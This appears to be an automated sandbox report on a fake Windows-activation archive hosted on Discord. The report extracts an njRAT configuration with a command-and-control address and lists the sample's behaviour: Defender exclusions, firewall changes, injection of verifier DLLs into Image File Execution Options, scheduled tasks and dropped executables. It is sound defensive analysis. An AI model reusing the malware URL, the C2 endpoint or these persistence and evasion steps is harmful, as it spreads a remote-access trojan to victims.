Analysis
-
max time kernel
60s -
max time network
62s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 17:57
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1241155149938954361/1316826199187783790/activate-windows.rar?ex=675c7577&is=675b23f7&hm=819a1d87c57a337665c84eaa15a12a319312e0f6ce1d43f1870c7f82c4125ec9&
Resource
win10v2004-20241007-en
General
-
Target
https://cdn.discordapp.com/attachments/1241155149938954361/1316826199187783790/activate-windows.rar?ex=675c7577&is=675b23f7&hm=819a1d87c57a337665c84eaa15a12a319312e0f6ce1d43f1870c7f82c4125ec9&
Malware Config
Extracted
njrat
0.7d
MPG
49.228.131.165:2422
fa6b40864b6c109adbc85023cd1f59d2
-
reg_key
fa6b40864b6c109adbc85023cd1f59d2
-
splitter
Y262SUCZ4UJJ
Signatures
-
Njrat family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 36 1900 powershell.exe 38 4672 rundll32.exe 39 4672 rundll32.exe 40 3988 powershell.exe 55 6004 rundll32.exe 56 4276 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1908 powershell.exe 3172 powershell.exe 3988 powershell.exe 4276 powershell.exe 1900 powershell.exe 4832 powershell.exe 5192 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_ActivationInterval = "120" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierDlls = "SppExtComObjHook.dll" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_HWID = "4187226795851251830" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\GlobalFlag = "256" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_RenewalInterval = "10080" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_ActivationInterval = "120" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_Emulation = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_ActivationInterval = "120" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierFlags = "2147483648" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\GlobalFlag = "256" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_ActivationInterval = "120" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_Emulation = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_HWID = "4187226795851251830" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_RenewalInterval = "10080" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierDebug = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierFlags = "2147483648" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_RenewalInterval = "10080" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierDlls = "SppExtComObjHook.dll" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierDebug = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_RenewalInterval = "10080" reg.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3700 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation MyPrograme.exe -
Executes dropped EXE 4 IoCs
pid Process 3492 MyPrograme.exe 1016 setup.exe 5252 wininitt.exe 5684 wininitt.exe -
Loads dropped DLL 5 IoCs
pid Process 3492 MyPrograme.exe 3492 MyPrograme.exe 4672 rundll32.exe 6004 rundll32.exe 1908 Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 35 raw.githubusercontent.com 36 raw.githubusercontent.com 38 raw.githubusercontent.com 40 raw.githubusercontent.com 55 raw.githubusercontent.com 56 raw.githubusercontent.com -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\D3DX9.dll MyPrograme.exe File opened for modification C:\Windows\SysWOW64\D3DX9.dll MyPrograme.exe File created C:\Windows\System32\vcruntime143_thread.dll powershell.exe File opened for modification C:\Windows\System32\vcruntime143_thread.dll setup.exe File created C:\Windows\System32\SppExtComObjHook.dll powershell.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Help\service rundll32.exe File created C:\Windows\Help\service\wininitt.exe powershell.exe File opened for modification C:\Windows\Help\service\wininitt.exe rundll32.exe File opened for modification C:\Windows\Help\service rundll32.exe File created C:\Windows\Help\service\wininitt.exe powershell.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 388 sc.exe 4664 sc.exe 4644 sc.exe 5148 sc.exe 5964 sc.exe 2004 sc.exe 3976 sc.exe 1076 sc.exe 5984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininitt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MyPrograme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininitt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Integrator.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1020 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MyPrograme.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion MyPrograme.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Integrator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS MyPrograme.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Integrator.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784998509690858" chrome.exe Key deleted \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState reg.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings MyPrograme.exe -
Modifies registry key 1 TTPs 46 IoCs
pid Process 4372 reg.exe 4808 reg.exe 2004 reg.exe 6112 reg.exe 6048 reg.exe 1852 reg.exe 5520 reg.exe 4420 reg.exe 1712 reg.exe 5456 reg.exe 5604 reg.exe 4392 reg.exe 3156 reg.exe 312 reg.exe 384 reg.exe 5396 reg.exe 3592 reg.exe 5148 reg.exe 228 reg.exe 5812 reg.exe 2180 reg.exe 5188 reg.exe 5312 reg.exe 5732 reg.exe 5076 reg.exe 5564 reg.exe 5624 reg.exe 5076 reg.exe 6136 reg.exe 5212 reg.exe 1236 reg.exe 5496 reg.exe 312 reg.exe 5660 reg.exe 6020 reg.exe 1060 reg.exe 4568 reg.exe 8 reg.exe 4360 reg.exe 1900 reg.exe 5424 reg.exe 876 reg.exe 6016 reg.exe 1344 reg.exe 5392 reg.exe 5380 reg.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5952 schtasks.exe 5168 schtasks.exe 876 schtasks.exe 1940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 2256 powershell.exe 2256 powershell.exe 2256 powershell.exe 5008 powershell.exe 5008 powershell.exe 5008 powershell.exe 1908 powershell.exe 1908 powershell.exe 1908 powershell.exe 1900 powershell.exe 1900 powershell.exe 1900 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 4832 powershell.exe 4832 powershell.exe 4832 powershell.exe 5792 powershell.exe 5792 powershell.exe 5792 powershell.exe 6024 powershell.exe 6024 powershell.exe 6024 powershell.exe 4276 powershell.exe 4276 powershell.exe 4276 powershell.exe 5192 powershell.exe 5192 powershell.exe 5192 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeRestorePrivilege 4540 7zG.exe Token: 35 4540 7zG.exe Token: SeSecurityPrivilege 4540 7zG.exe Token: SeSecurityPrivilege 4540 7zG.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeIncreaseQuotaPrivilege 4888 WMIC.exe Token: SeSecurityPrivilege 4888 WMIC.exe Token: SeTakeOwnershipPrivilege 4888 WMIC.exe Token: SeLoadDriverPrivilege 4888 WMIC.exe Token: SeSystemProfilePrivilege 4888 WMIC.exe Token: SeSystemtimePrivilege 4888 WMIC.exe Token: SeProfSingleProcessPrivilege 4888 WMIC.exe Token: SeIncBasePriorityPrivilege 4888 WMIC.exe Token: SeCreatePagefilePrivilege 4888 WMIC.exe Token: SeBackupPrivilege 4888 WMIC.exe Token: SeRestorePrivilege 4888 WMIC.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 4540 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1016 setup.exe 396 Integrator.exe 396 Integrator.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3340 wrote to memory of 3708 3340 chrome.exe 83 PID 3340 wrote to memory of 3708 3340 chrome.exe 83 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 904 3340 chrome.exe 84 PID 3340 wrote to memory of 1984 3340 chrome.exe 85 PID 3340 wrote to memory of 1984 3340 chrome.exe 85 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 PID 3340 wrote to memory of 232 3340 chrome.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1241155149938954361/1316826199187783790/activate-windows.rar?ex=675c7577&is=675b23f7&hm=819a1d87c57a337665c84eaa15a12a319312e0f6ce1d43f1870c7f82c4125ec9&1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4807cc40,0x7ffd4807cc4c,0x7ffd4807cc582⤵PID:3708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:22⤵PID:904
-
-
